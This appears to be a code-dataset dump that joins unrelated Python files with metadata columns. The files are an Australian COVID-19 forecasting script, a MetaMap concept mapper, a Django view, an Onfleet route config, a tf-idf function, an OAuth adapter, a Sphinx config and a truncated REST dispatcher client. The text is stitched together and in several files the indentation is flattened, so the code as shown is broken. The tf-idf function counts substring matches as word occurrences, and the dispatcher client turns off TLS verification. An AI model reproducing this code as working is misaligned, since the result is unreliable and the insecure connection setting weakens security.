# 'ACT':0.95,#0.771,
# 'NT':0.95,#0.761
# }
# ##Initialise the number of cases as 1st of March data incidence
# current = {
# 'ACT':[0,0,0],
# 'NSW':[10,0,2], #1
# 'NT':[0,0,0],
# 'QLD':[2,0,0],
# 'SA':[2,0,0],
# 'TAS':[0,0,0],
# 'VIC':[2,0,0], #1
# 'WA':[0,0,0],
# }
# if len(argv)>=3:
# forecast_type = argv[3]
# else:
# forecast_type = None
# forecast_dict = {}
# for state in states:
# initial_people = ['I']*current[state][0] + \
# ['A']*current[state][1] + \
# ['S']*current[state][2]
# people = {}
# if abc:
# #qs_prior = beta(10,10,size=10000)
# #qi_prior = beta(17, 3, size=10000)
# #qa_prior = beta(3,7, size=10000)
# qi_prior = [qi_d[state]]
# qs_prior = [local_detection[state]]
# qa_prior = [a_local_detection[state]]
# gam =np.maximum(0.1,np.minimum(2,gamma(4,0.25, size=1000)))
# ps_prior = beta(10,10,size=1000)
# else:
# qi_prior = [qi_d[state]]
# qs_prior = [local_detection[state]]
# qa_prior = [a_local_detection[state]]
# gam =[1/2]
# ps_prior = 0.2
# ps_prior= [ps_prior]
# for i,cat in enumerate(initial_people):
# people[i] = Person(0,0,0,0,cat)
# if state in ['VIC']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 1, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# elif state in ['NSW']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 1, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# elif state in ['ACT','NT']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 0.5, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# else:
# forecast_dict[state] = Forecast(current[state],state,
# start_date,people,
# alpha_i= 0.5, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R = forecast_type , R_I = R_I,forecast_date=forecast_date,
# cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# if __name__ =="__main__":
# for key,item in forecast_dict.items():
# item.read_in_Reff()
# pool = mp.Pool(8)
# l_df_results =pool.map(worker,
# [(obj,'simulate_many',time_end, n_sims)
# for key,obj in forecast_dict.items()]
# )
# pool.close()
# pool.join()
# #record quantiles in separate file
# dic_states={
# 'state':[],
# 'date':[],
# 'type':[],
# 'bottom':[],
# 'lower':[],
# 'median':[],
# 'upper':[],
# 'top':[],
# }
# dates =pd.date_range(start = start_date,
# periods=time_end #num of days
# )
# vars_l = ['symp_inci_obs','imports_inci_obs','asymp_inci_obs','symp_inci','asymp_inci','imports_inci','total_inci','total_inci_obs']
# for var in vars_l:
# for state,df in l_df_results:
# df = df[[col.strftime('%Y-%m-%d') for
# col in dates]]
# quantiles = df.loc[var].quantile([0.05,0.25,0.5,0.75,0.95],axis=0)
# dic_states['state'].extend([state]*len(dates))
# dic_states['date'].extend(df.columns)
# dic_states['type'].extend([var]*len(dates))
# dic_states['bottom'].extend(quantiles.loc[0.05])
# dic_states['lower'].extend(quantiles.loc[0.25])
# dic_states['median'].extend(quantiles.loc[0.50])
# dic_states['upper'].extend(quantiles.loc[0.75])
# dic_states['top'].extend(quantiles.loc[0.95])
# plots =pd.DataFrame.from_dict(dic_states)
# plots.to_parquet('./results/quantiles'+forecast_type+start_date+"sim_"+str(n_sims)+"days_"+str(time_end)+".parquet") | en | 0.528404 | # This method of running simulations is deprecated in favour of run_state.py # from sim_class import * # import pandas as pd # from sys import argv # from numpy.random import beta, gamma # #from joblib import Parallel, delayed # import multiprocessing as mp # def worker(arg): # obj, methname = arg[:2] # return getattr(obj,methname)(*arg[2:]) # n_sims=int(argv[1]) #number of sims # time_end = int(argv[2]) # states = ['NSW','QLD','SA','TAS','VIC','WA','ACT','NT'] # #states = ['QLD','VIC'] # start_date = '2020-03-01' # case_file_date = ['06Jul','0915'] # forecast_date = '2020-07-06' # R_I='R_I' # abc =False # if R_I is not None: # print("Using model output for R_L and R_I") # local_detection = { # 'NSW':0.5,#0.556,#0.65, # 'QLD':0.4,#0.353,#0.493,#0.74, # 'SA':0.38,#0.597,#0.75, # 'TAS':0.3,#0.598,#0.48, # 'VIC':0.56,#0.558,#0.77, # 'WA':0.38,#0.409,#0.509,#0.66, # 'ACT':0.8,#0.557,#0.65, # 'NT':0.8,#0.555,#0.71 # } # a_local_detection = { # 'NSW':0.1,#0.556,#0.65, # 'QLD':0.05,#0.353,#0.493,#0.74, # 'SA':0.05,#0.597,#0.75, # 'TAS':0.05,#0.598,#0.48, # 'VIC':0.13,#0.558,#0.77, # 'WA':0.05,#0.409,#0.509,#0.66, # 'ACT':0.2,#0.557,#0.65, # 'NT':0.2,#0.555,#0.71 # } # qi_d = { # 'NSW':0.95,#0.758, # 'QLD':0.95,#0.801, # 'SA':0.95,#0.792, # 'TAS':0.95,#0.800, # 'VIC':0.95,#0.735, # 'WA':0.95,#0.792, # 'ACT':0.95,#0.771, # 'NT':0.95,#0.761 # } # ##Initialise the number of cases as 1st of March data incidence # current = { # 'ACT':[0,0,0], # 'NSW':[10,0,2], #1 # 'NT':[0,0,0], # 'QLD':[2,0,0], # 'SA':[2,0,0], # 'TAS':[0,0,0], # 'VIC':[2,0,0], #1 # 'WA':[0,0,0], # } # if len(argv)>=3: # forecast_type = argv[3] # else: # forecast_type = None # forecast_dict = {} # for state in states: # initial_people = ['I']*current[state][0] + \ # ['A']*current[state][1] + \ # ['S']*current[state][2] # people = {} # if abc: # #qs_prior = beta(10,10,size=10000) # #qi_prior = beta(17, 3, size=10000) # #qa_prior = beta(3,7, size=10000) # qi_prior = [qi_d[state]] # qs_prior = [local_detection[state]] # qa_prior = [a_local_detection[state]] # gam =np.maximum(0.1,np.minimum(2,gamma(4,0.25, size=1000))) # ps_prior = beta(10,10,size=1000) # else: # qi_prior = [qi_d[state]] # qs_prior = [local_detection[state]] # qa_prior = [a_local_detection[state]] # gam =[1/2] # ps_prior = 0.2 # ps_prior= [ps_prior] # for i,cat in enumerate(initial_people): # people[i] = Person(0,0,0,0,cat) # if state in ['VIC']: # forecast_dict[state] = Forecast(current[state], # state,start_date,people, # alpha_i= 1, k =0.1,gam_list=gam, # qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior, # qua_ai=1,qua_qi_factor=1,qua_qs_factor=1, # forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date, # cross_border_state=None,cases_file_date=case_file_date, # ps_list = ps_prior, # ) # elif state in ['NSW']: # forecast_dict[state] = Forecast(current[state], # state,start_date,people, # alpha_i= 1, k =0.1,gam_list=gam, # qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior, # qua_ai=1,qua_qi_factor=1,qua_qs_factor=1, # forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date, # cross_border_state=None,cases_file_date=case_file_date, # ps_list = ps_prior, # ) # elif state in ['ACT','NT']: # forecast_dict[state] = Forecast(current[state], # state,start_date,people, # alpha_i= 0.5, k =0.1,gam_list=gam, # qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior, # qua_ai=1,qua_qi_factor=1,qua_qs_factor=1, # forecast_R 
=forecast_type, R_I = R_I,forecast_date=forecast_date, # cross_border_state=None,cases_file_date=case_file_date, # ps_list = ps_prior, # ) # else: # forecast_dict[state] = Forecast(current[state],state, # start_date,people, # alpha_i= 0.5, k =0.1,gam_list=gam, # qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior, # qua_ai=1,qua_qi_factor=1,qua_qs_factor=1, # forecast_R = forecast_type , R_I = R_I,forecast_date=forecast_date, # cases_file_date=case_file_date, # ps_list = ps_prior, # ) # if __name__ =="__main__": # for key,item in forecast_dict.items(): # item.read_in_Reff() # pool = mp.Pool(8) # l_df_results =pool.map(worker, # [(obj,'simulate_many',time_end, n_sims) # for key,obj in forecast_dict.items()] # ) # pool.close() # pool.join() # #record quantiles in separate file # dic_states={ # 'state':[], # 'date':[], # 'type':[], # 'bottom':[], # 'lower':[], # 'median':[], # 'upper':[], # 'top':[], # } # dates =pd.date_range(start = start_date, # periods=time_end #num of days # ) # vars_l = ['symp_inci_obs','imports_inci_obs','asymp_inci_obs','symp_inci','asymp_inci','imports_inci','total_inci','total_inci_obs'] # for var in vars_l: # for state,df in l_df_results: # df = df[[col.strftime('%Y-%m-%d') for # col in dates]] # quantiles = df.loc[var].quantile([0.05,0.25,0.5,0.75,0.95],axis=0) # dic_states['state'].extend([state]*len(dates)) # dic_states['date'].extend(df.columns) # dic_states['type'].extend([var]*len(dates)) # dic_states['bottom'].extend(quantiles.loc[0.05]) # dic_states['lower'].extend(quantiles.loc[0.25]) # dic_states['median'].extend(quantiles.loc[0.50]) # dic_states['upper'].extend(quantiles.loc[0.75]) # dic_states['top'].extend(quantiles.loc[0.95]) # plots =pd.DataFrame.from_dict(dic_states) # plots.to_parquet('./results/quantiles'+forecast_type+start_date+"sim_"+str(n_sims)+"days_"+str(time_end)+".parquet") | 2.134897 | 2 |
machine_read_scripts/NER_metamap.py | sanyabt/napdi-kg | 3 | 6616701 | from pymetamap import MetaMap
import pickle
import os
import indra
import re
from indra.statements import stmts_from_json_file
#create instance for metamap API, path from local file
workingDir = os.getcwd()
dir_out = workingDir + '/output_files/'
file_reach = dir_out + 'kratom/0_58_reach_output_assembly.json'
dir_log = workingDir + '/logs/'
mm = MetaMap.get_instance('/media/extension-1/UMLS/MetaMap/public_mm/bin/metamap')
with open(dir_out+'umls_dict.pickle', 'rb') as file_p:
umls_dict = pickle.load(file_p)
#make more sophisticated> currently takes the first MetaMap concept as highest score (same scores ignored)
def extract_concepts_umls(entity, umls_count):
    # re.sub(r"\(|\)", "", text)
entity = re.sub(r'\(|\)', '', entity)
entity = re.sub(r'[^\x00-\x7F]+','', entity)
text = [entity]
#take the concept with highest score
concepts,error = mm.extract_concepts(text)
if concepts:
concept = concepts[0]
try:
umls_dict[entity] = {
'cui': concept.cui,
'umls_term': concept.preferred_name,
'sem_type': concept.semtypes.strip('][').split(','),
'score': float(concept.score)
}
umls_count += 1
except AttributeError:
pass
return umls_count
if __name__ == '__main__':
umls_count = 0
reach_concepts = []
stmts = stmts_from_json_file(file_reach)
#for item in stmts:
# reach_concepts.extend(item.agent_list())
for item in stmts:
agents_list = item.agent_list()
for agent in agents_list:
if agent:
if agent.db_refs:
if 'TEXT' in agent.db_refs:
reach_concepts.append(agent.db_refs['TEXT'])
else:
reach_concepts.extend(item.agent_list())
else:
reach_concepts.extend(item.agent_list())
else:
reach_concepts.extend(item.agent_list())
concepts = set(reach_concepts)
#call function to extract concepts
concepts_list = list(concepts)
print(len(concepts_list))
index = 0
for concept in concepts_list:
umls_count = extract_concepts_umls(str(concept), umls_count)
index += 1
if index%1000 == 0:
print(index)
total_count = len(concepts_list)
#save dictionaries to pickle files
with open(dir_out+'umls_dict_20211004.pickle', 'wb') as file_o:
pickle.dump(umls_dict, file_o)
with open(dir_log+'NER_log.txt', 'w') as file_log:
file_log.write('Total concepts = '+str(total_count))
file_log.write('\nUMLS mapped concepts = '+str(umls_count))
| from pymetamap import MetaMap
import pickle
import os
import indra
import re
from indra.statements import stmts_from_json_file
#create instance for metamap API, path from local file
workingDir = os.getcwd()
dir_out = workingDir + '/output_files/'
file_reach = dir_out + 'kratom/0_58_reach_output_assembly.json'
dir_log = workingDir + '/logs/'
mm = MetaMap.get_instance('/media/extension-1/UMLS/MetaMap/public_mm/bin/metamap')
with open(dir_out+'umls_dict.pickle', 'rb') as file_p:
umls_dict = pickle.load(file_p)
#make more sophisticated> currently takes the first MetaMap concept as highest score (same scores ignored)
def extract_concepts_umls(entity, umls_count):
    # re.sub(r"\(|\)", "", text)
entity = re.sub(r'\(|\)', '', entity)
entity = re.sub(r'[^\x00-\x7F]+','', entity)
text = [entity]
#take the concept with highest score
concepts,error = mm.extract_concepts(text)
if concepts:
concept = concepts[0]
try:
umls_dict[entity] = {
'cui': concept.cui,
'umls_term': concept.preferred_name,
'sem_type': concept.semtypes.strip('][').split(','),
'score': float(concept.score)
}
umls_count += 1
except AttributeError:
pass
return umls_count
if __name__ == '__main__':
umls_count = 0
reach_concepts = []
stmts = stmts_from_json_file(file_reach)
#for item in stmts:
# reach_concepts.extend(item.agent_list())
for item in stmts:
agents_list = item.agent_list()
for agent in agents_list:
if agent:
if agent.db_refs:
if 'TEXT' in agent.db_refs:
reach_concepts.append(agent.db_refs['TEXT'])
else:
reach_concepts.extend(item.agent_list())
else:
reach_concepts.extend(item.agent_list())
else:
reach_concepts.extend(item.agent_list())
concepts = set(reach_concepts)
#call function to extract concepts
concepts_list = list(concepts)
print(len(concepts_list))
index = 0
for concept in concepts_list:
umls_count = extract_concepts_umls(str(concept), umls_count)
index += 1
if index%1000 == 0:
print(index)
total_count = len(concepts_list)
#save dictionaries to pickle files
with open(dir_out+'umls_dict_20211004.pickle', 'wb') as file_o:
pickle.dump(umls_dict, file_o)
with open(dir_log+'NER_log.txt', 'w') as file_log:
file_log.write('Total concepts = '+str(total_count))
file_log.write('\nUMLS mapped concepts = '+str(umls_count))
| en | 0.791027 | #create instance for metamap API, path from local file #make more sophisticated> currently takes the first MetaMap concept as highest score (same scores ignored) #re.sub(r”\(|\)“, “”, text) #take the concept with highest score #for item in stmts: # reach_concepts.extend(item.agent_list()) #call function to extract concepts #save dictionaries to pickle files | 2.353041 | 2 |
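The NER_metamap.py entry above notes ("make more sophisticated") that extract_concepts_umls simply keeps the first concept MetaMap returns. A hedged sketch of selecting the highest-scoring concept instead is shown below; it assumes, as the entry does, that each concept object exposes a numeric score attribute.

# Sketch: choose the MetaMap concept with the highest score rather than the first one.
# Assumes each concept exposes a numeric `score` attribute, as used in the entry above.
def best_concept(concepts):
    scored = [c for c in concepts if hasattr(c, "score")]
    if not scored:
        return None
    return max(scored, key=lambda c: float(c.score))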
makahiki/apps/widgets/status/referrals/views.py | justinslee/Wai-Not-Makahiki | 1 | 6616702 | """handles request for referral status."""
from django.db.models.aggregates import Count
from apps.managers.player_mgr.models import Profile
def supply(request, page_name):
"""supply view_objects for user status."""
_ = page_name
_ = request
# Find referrals.
referrals = Profile.objects.filter(referring_user__isnull=False).values(
'referring_user__profile__name', 'referring_user__username').annotate(
referrals=Count('referring_user')
)
return {
'referrals': referrals,
}
| """handles request for referral status."""
from django.db.models.aggregates import Count
from apps.managers.player_mgr.models import Profile
def supply(request, page_name):
"""supply view_objects for user status."""
_ = page_name
_ = request
# Find referrals.
referrals = Profile.objects.filter(referring_user__isnull=False).values(
'referring_user__profile__name', 'referring_user__username').annotate(
referrals=Count('referring_user')
)
return {
'referrals': referrals,
}
| en | 0.690949 | handles request for referral status. supply view_objects for user status. # Find referrals. | 2.26635 | 2 |
onfleet/config.py | saduqz/pyonfleet | 0 | 6616703 | <gh_stars>0
class Config(object):
data = dict(
URL = dict(
base_url = "https://onfleet.com/api/",
version = "v2/",
auth_test = "auth/test/"
),
RESOURCES = dict(
admins = dict(
GET = dict(
get = "/admins"
),
POST = dict(
create = "/admins"
),
PUT = dict(
update = "/admins/:adminId"
),
DELETE = dict(
deleteOne = "/admins/:adminId"
)
),
administrators = dict(
GET = dict(
get = "/admins"
),
POST = dict(
create = "/admins"
),
PUT = dict(
update = "/admins/:adminId"
),
DELETE = dict(
deleteOne = "/admins/:adminId"
)
),
containers = dict(
GET = dict(
get = "/containers/:param/:containerId"
),
PUT = dict(
update = "/containers/:containerId"
)
),
destinations = dict(
GET = dict(
get = "/destinations/:destinationId"
),
POST = dict(
create = "/destinations"
)
),
hubs = dict(
GET = dict(
get = "/hubs"
)
),
organization = dict(
GET = dict(
get = ["/organization", "/organizations/:orgId"]
),
PUT = dict(
insertTask = "/containers/organization/:orgId"
)
),
recipients = dict(
GET = dict(
get = "/recipients/:recipientId"
),
POST = dict(
create = "/recipients"
),
PUT = dict(
update = "/recipients/:recipientId"
)
),
tasks = dict(
GET = dict(
get = ["/tasks/all", "/tasks/:taskId"]
),
POST = dict(
create = "/tasks",
clone = "/tasks/:taskId/clone",
forceComplete = "/tasks/:taskId/complete",
batchCreate = "/tasks/batch",
autoAssign = "/tasks/autoAssign"
),
PUT = dict(
update = "/tasks/:taskId"
),
DELETE = dict(
deleteOne = "/tasks/:taskId"
)
),
teams = dict(
GET = dict(
get = ["/teams", "/teams/:teamId"]
),
POST = dict(
create = "/teams"
),
PUT = dict(
update = "/teams/:teamId",
insertTask = "/containers/teams/:teamId"
),
DELETE = dict(
deleteOne = "/teams/:teamId"
)
),
workers = dict(
GET = dict(
get = ["/workers", "/workers/:workerId"],
getSchedule = "/workers/:workerId/schedule",
getByLocation = "/workers/location"
),
POST = dict(
create = "/workers",
setSchedule = "/workers/:workerId/schedule"
),
PUT = dict(
update = "/workers/:workerId",
insertTask = "/containers/workers/:workerId"
),
DELETE = dict(
deleteOne = "/workers/:workerId"
)
),
webhooks = dict(
GET = dict(
get = "/webhooks"
),
POST = dict(
create = "/webhooks"
),
DELETE = dict(
deleteOne = "/webhooks/:webhookId"
)
)
)
) | class Config(object):
data = dict(
URL = dict(
base_url = "https://onfleet.com/api/",
version = "v2/",
auth_test = "auth/test/"
),
RESOURCES = dict(
admins = dict(
GET = dict(
get = "/admins"
),
POST = dict(
create = "/admins"
),
PUT = dict(
update = "/admins/:adminId"
),
DELETE = dict(
deleteOne = "/admins/:adminId"
)
),
administrators = dict(
GET = dict(
get = "/admins"
),
POST = dict(
create = "/admins"
),
PUT = dict(
update = "/admins/:adminId"
),
DELETE = dict(
deleteOne = "/admins/:adminId"
)
),
containers = dict(
GET = dict(
get = "/containers/:param/:containerId"
),
PUT = dict(
update = "/containers/:containerId"
)
),
destinations = dict(
GET = dict(
get = "/destinations/:destinationId"
),
POST = dict(
create = "/destinations"
)
),
hubs = dict(
GET = dict(
get = "/hubs"
)
),
organization = dict(
GET = dict(
get = ["/organization", "/organizations/:orgId"]
),
PUT = dict(
insertTask = "/containers/organization/:orgId"
)
),
recipients = dict(
GET = dict(
get = "/recipients/:recipientId"
),
POST = dict(
create = "/recipients"
),
PUT = dict(
update = "/recipients/:recipientId"
)
),
tasks = dict(
GET = dict(
get = ["/tasks/all", "/tasks/:taskId"]
),
POST = dict(
create = "/tasks",
clone = "/tasks/:taskId/clone",
forceComplete = "/tasks/:taskId/complete",
batchCreate = "/tasks/batch",
autoAssign = "/tasks/autoAssign"
),
PUT = dict(
update = "/tasks/:taskId"
),
DELETE = dict(
deleteOne = "/tasks/:taskId"
)
),
teams = dict(
GET = dict(
get = ["/teams", "/teams/:teamId"]
),
POST = dict(
create = "/teams"
),
PUT = dict(
update = "/teams/:teamId",
insertTask = "/containers/teams/:teamId"
),
DELETE = dict(
deleteOne = "/teams/:teamId"
)
),
workers = dict(
GET = dict(
get = ["/workers", "/workers/:workerId"],
getSchedule = "/workers/:workerId/schedule",
getByLocation = "/workers/location"
),
POST = dict(
create = "/workers",
setSchedule = "/workers/:workerId/schedule"
),
PUT = dict(
update = "/workers/:workerId",
insertTask = "/containers/workers/:workerId"
),
DELETE = dict(
deleteOne = "/workers/:workerId"
)
),
webhooks = dict(
GET = dict(
get = "/webhooks"
),
POST = dict(
create = "/webhooks"
),
DELETE = dict(
deleteOne = "/webhooks/:webhookId"
)
)
)
) | none | 1 | 2.018031 | 2 | |
vector_semantics/tf_idf.py | newvicklee/nlp_algorithms | 0 | 6616704 | """
Term frequency - inverse document frequency (tf-idf)
Parameters:
documents: an array of strings
Returns:
m: term-document matrix where each row is a vector of the word represented by tf-idf scores in each document/column
documents = [
"a fox swimming across a river",
"was barely able to reach the bank",
"where he lay bruised and exhausted from his struggle with the swift current",
"soon a swarm of blood-sucking flies settled on him",
"but he lay quietly, still too weak to run away from them",
"a hedgehog happened by.",
"let me drive the flies away, he said kindly.",
"no, no! exclaimed the fox, do not disturb them!",
]
matrix, word_to_index = tf_idf(documents)
matrix[word_to_index['fox']]
# word vector for fox: [0.18123812 0. 0. 0. 0. 0.
0. 0.18123812]
"""
import re
import math
import numpy as np
def tf_idf(documents):
def get_vocab(documents):
v = set()
for doc in documents:
            v.update(re.split(r'\W+', doc))
return v
def get_idf(documents, vocab):
N = len(documents)
idf = {}
for w in vocab:
idf[w] = 0
for doc in documents:
if w in doc:
idf[w] += 1
idf[w] = math.log10(N / idf[w])
return idf
vocab = get_vocab(documents)
num_of_docs = len(documents)
idf = get_idf(documents, vocab)
m = np.zeros((len(vocab), num_of_docs))
word_to_index = {}
for w_idx, word in enumerate(vocab):
word_to_index[word] = w_idx
for d_idx, doc in enumerate(documents):
tf = math.log10(doc.count(word) + 1)
tf_idf = tf * idf[word]
m[w_idx, d_idx] = tf_idf
return m, word_to_index
| """
Term frequency - inverse document frequency (tf-idf)
Parameters:
documents: an array of strings
Returns:
m: term-document matrix where each row is a vector of the word represented by tf-idf scores in each document/column
documents = [
"a fox swimming across a river",
"was barely able to reach the bank",
"where he lay bruised and exhausted from his struggle with the swift current",
"soon a swarm of blood-sucking flies settled on him",
"but he lay quietly, still too weak to run away from them",
"a hedgehog happened by.",
"let me drive the flies away, he said kindly.",
"no, no! exclaimed the fox, do not disturb them!",
]
matrix, word_to_index = tf_idf(documents)
matrix[word_to_index['fox']]
# word vector for fox: [0.18123812 0. 0. 0. 0. 0.
0. 0.18123812]
"""
import re
import math
import numpy as np
def tf_idf(documents):
def get_vocab(documents):
v = set()
for doc in documents:
            v.update(re.split(r'\W+', doc))
return v
def get_idf(documents, vocab):
N = len(documents)
idf = {}
for w in vocab:
idf[w] = 0
for doc in documents:
if w in doc:
idf[w] += 1
idf[w] = math.log10(N / idf[w])
return idf
vocab = get_vocab(documents)
num_of_docs = len(documents)
idf = get_idf(documents, vocab)
m = np.zeros((len(vocab), num_of_docs))
word_to_index = {}
for w_idx, word in enumerate(vocab):
word_to_index[word] = w_idx
for d_idx, doc in enumerate(documents):
tf = math.log10(doc.count(word) + 1)
tf_idf = tf * idf[word]
m[w_idx, d_idx] = tf_idf
return m, word_to_index
| en | 0.888743 | Term frequency - inverse document frequency (tf-idf) Parameters: documents: an array of strings Returns: m: term-document matrix where each row is a vector of the word represented by tf-idf scores in each document/column documents = [ "a fox swimming across a river", "was barely able to reach the bank", "where he lay bruised and exhausted from his struggle with the swift current", "soon a swarm of blood-sucking flies settled on him", "but he lay quietly, still too weak to run away from them", "a hedgehog happened by.", "let me drive the flies away, he said kindly.", "no, no! exclaimed the fox, do not disturb them!", ] matrix, word_to_index = tf_idf(documents) matrix[word_to_index['fox']] # word vector for fox: [0.18123812 0. 0. 0. 0. 0. 0. 0.18123812] | 3.849041 | 4 |
allauth/socialaccount/providers/mixer/views.py | wisr/django-allauth | 2 | 6616705 | <gh_stars>1-10
import requests
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import MixerProvider
class MixerOAuth2Adapter(OAuth2Adapter):
provider_id = MixerProvider.id
access_token_url = 'https://mixer.com/api/v1/oauth/token'
authorize_url = 'https://mixer.com/oauth/authorize'
profile_url = 'https://mixer.com/api/v1/users/current'
def complete_login(self, request, app, token, **kwargs):
headers = {'Authorization': 'Bearer {}'.format(token.token)}
response = requests.get(self.profile_url, headers=headers)
response.raise_for_status()
data = response.json()
return self.get_provider().sociallogin_from_response(
request, data
)
oauth2_login = OAuth2LoginView.adapter_view(MixerOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(MixerOAuth2Adapter)
| import requests
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import MixerProvider
class MixerOAuth2Adapter(OAuth2Adapter):
provider_id = MixerProvider.id
access_token_url = 'https://mixer.com/api/v1/oauth/token'
authorize_url = 'https://mixer.com/oauth/authorize'
profile_url = 'https://mixer.com/api/v1/users/current'
def complete_login(self, request, app, token, **kwargs):
headers = {'Authorization': 'Bearer {}'.format(token.token)}
response = requests.get(self.profile_url, headers=headers)
response.raise_for_status()
data = response.json()
return self.get_provider().sociallogin_from_response(
request, data
)
oauth2_login = OAuth2LoginView.adapter_view(MixerOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(MixerOAuth2Adapter) | none | 1 | 2.332892 | 2 | |
.docs/conf.py | Amacc/SNowCli | 0 | 6616706 |
author = '<NAME>'
copyright = '2018, <NAME>'
description = 'Just playing around with cli commands'
exclude_patterns = ['_build','**/venv']
extensions = ['sphinx_click.ext']
html_theme = 'sphinx_rtd_theme'
htmlhelp_basename = 'SnowCli'
master_doc= 'index'
project = 'snowcli'
project_short_name ='snowcli'
pygments_style = 'sphinx'
todo_include_todos = True
todo_link_only = True
latex_elements = {}
latex_documents = [
(master_doc, f'{project_short_name}.tex', project,
author, 'manual'),
]
man_pages = [
(master_doc, project_short_name, project,
[author], 1)
]
texinfo_documents = [
(master_doc, project_short_name, project,
author, project_short_name, description,
'Miscellaneous'),
]
intersphinx_mapping = {'https://docs.python.org/': None}
import sys, os
sys.path.append(os.path.abspath('..'))
|
author = '<NAME>'
copyright = '2018, <NAME>'
description = 'Just playing around with cli commands'
exclude_patterns = ['_build','**/venv']
extensions = ['sphinx_click.ext']
html_theme = 'sphinx_rtd_theme'
htmlhelp_basename = 'SnowCli'
master_doc= 'index'
project = 'snowcli'
project_short_name ='snowcli'
pygments_style = 'sphinx'
todo_include_todos = True
todo_link_only = True
latex_elements = {}
latex_documents = [
(master_doc, f'{project_short_name}.tex', project,
author, 'manual'),
]
man_pages = [
(master_doc, project_short_name, project,
[author], 1)
]
texinfo_documents = [
(master_doc, project_short_name, project,
author, project_short_name, description,
'Miscellaneous'),
]
intersphinx_mapping = {'https://docs.python.org/': None}
import sys, os
sys.path.append(os.path.abspath('..'))
| none | 1 | 1.472645 | 1 | |
REST/dispatcherApi.py | 5genesis/Portal | 1 | 6616707 | <gh_stars>1-10
import json
from typing import Dict, Tuple, Optional, List
from app.models import User, Experiment
from .restClient import RestClient, Payload
from base64 import b64encode
from Helper import Config, Log, LogInfo
from app import db
from datetime import datetime, timezone
from os.path import split
class VimInfo:
def __init__(self, data):
self.Name = data['name']
self.Type = data['type']
self.Location = data['location']
def __str__(self):
return f'{self.Name} ({self.Type} - {self.Location})'
class DispatcherApi(RestClient):
def __init__(self):
config = Config().Dispatcher
super().__init__(config.Host, config.Port, "", https=True, insecure=True)
self.tokenExpiry = config.TokenExpiry
@staticmethod
def basicAuthHeader(user: str, password: str) -> Dict:
encoded = b64encode(bytes(f'{user}:{password}'.encode('ascii')))
return {'Authorization': f'Basic {encoded.decode("ascii")}'}
@staticmethod
def bearerAuthHeader(token: str) -> Dict:
return {'Authorization': f'Bearer {token}'}
def Register(self, user: User) -> Tuple[str, bool]:
""" Returns (<message>, <success>). """
url = '/auth/register'
data = {
'username': user.username,
'email': user.email,
'password': <PASSWORD>
}
try:
response = self.HttpPost(url, body=data, payload=Payload.Form)
status = self.ResponseStatusCode(response)
if status in [400, 200]:
message = self.ResponseToJson(response)['result']
return message, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
return f"Exception while accessing authentication: {e}", False
def GetToken(self, user: User) -> Tuple[str, bool]:
"""
Return a tuple (str, bool). The string contains the token OR the
error message, the boolean indicates success.
"""
url = '/auth/get_token'
try:
response = self.HttpGet(url, extra_headers=self.basicAuthHeader(user.username, user.password_hash))
status = self.ResponseStatusCode(response)
if status in [400, 200]:
result = self.ResponseToJson(response)['result']
return result, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
message = f"Error while retrieving token: {e}"
Log.E(message)
return message, False
def RenewUserToken(self, user: User) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
token, success = self.GetToken(user)
user.token = token if success else None
user.tokenTimestamp = datetime.now(timezone.utc) if success else None
db.session.add(user)
db.session.commit()
return token if not success else None
def RenewUserTokenIfExpired(self, user) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
tokenTimestamp = user.tokenTimestamp if user.tokenTimestamp is not None else datetime.min
tokenTimestamp = tokenTimestamp.replace(tzinfo=timezone.utc)
timespan = datetime.now(timezone.utc) - tokenTimestamp
if timespan.total_seconds() >= self.tokenExpiry:
return self.RenewUserToken(user)
else:
return None
def RunCampaign(self, experimentId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {"ExecutionId": None, "Success": False, "Message": maybeError}
token = user.CurrentDispatcherToken
descriptor = json.dumps(Experiment.query.get(experimentId).serialization())
url = f'/elcm/api/v0/run'
response = self.HttpPost(url, {'Content-Type': 'application/json', **self.bearerAuthHeader(token)}, descriptor)
status = RestClient.ResponseStatusCode(response)
if status != 200:
return {"ExecutionId": None, "Success": False,
"Message": f"Execution request failed with status {status}"}
else:
response = RestClient.ResponseToJson(response)
response.update({"Success": True, "Message": "No error"})
return response
def GetExecutionLogs(self, executionId: int, user: User) -> Dict:
